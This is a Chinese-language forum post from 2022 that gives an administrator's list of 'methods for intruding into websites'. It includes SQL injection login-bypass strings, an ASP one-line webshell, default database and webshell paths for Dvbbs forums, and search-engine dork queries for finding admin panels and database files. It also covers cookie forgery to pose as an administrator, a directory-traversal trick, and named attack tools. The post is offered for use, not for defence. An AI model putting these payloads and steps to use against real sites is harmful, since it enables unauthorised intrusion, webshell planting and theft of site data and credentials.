无名商城论坛

搜索
查看: 238|回复: 0

[其他技术] 【LSP】入侵网站的思路

[复制链接]

1万

主题

1万

帖子

3万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
32464
发表于 2022-5-8 17:01:21 | 显示全部楼层 |阅读模式


以下是入侵网站常用方法:
1.上传漏洞
如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.
再用
DOMAIN上传. 
2.注入漏洞
字符过滤不严造成的
3.暴库:把二级目录中间的/换成%5c 

   
4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:  ’or’’=’ " or "a"="a   ’) or
(’a’=’a   ") or ("a"="a  or 1=1--
’ or ’a’=’a
5.社会工程学。这个都知道吧。就是猜解。  
6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 (数据库必需得是
ASP或ASA的后缀)   
7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.
比如:默认数据库,默认后台地址,默认管理员帐号密码等    
8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe 工具:网站猎手 挖掘鸡 明小子
9.查看目录法:一些网站可以断开目录,可以访问目录。
210.37.95.65 images
10.工具溢出

      
11.搜索引擎利用:   (1).inurl:flasher_list.asp  默认数据库:database/flash.mdb  后台/manager/
(2).找网站的管理后台地址: site:xxxx.com intext:管理 site:xxxx.com intitle:管理  〈关键字很多,自已找〉 site:xxxx.com inurl:login
(3).查找access的数据库,mssql、mysql的连接文件 allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
12.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。
13.利用常见的漏洞:如动网BBS
可以先用:dvbbs权限提升工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用
WSockExpert取得Cookies/NC包
这个我就不做了,网上教程多的是,自已下个看看。 工具:dvbbs权限提升工具  动网固顶贴工具
14.还有一些老漏洞。如IIS3,4的查看源码,5的Delete   CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表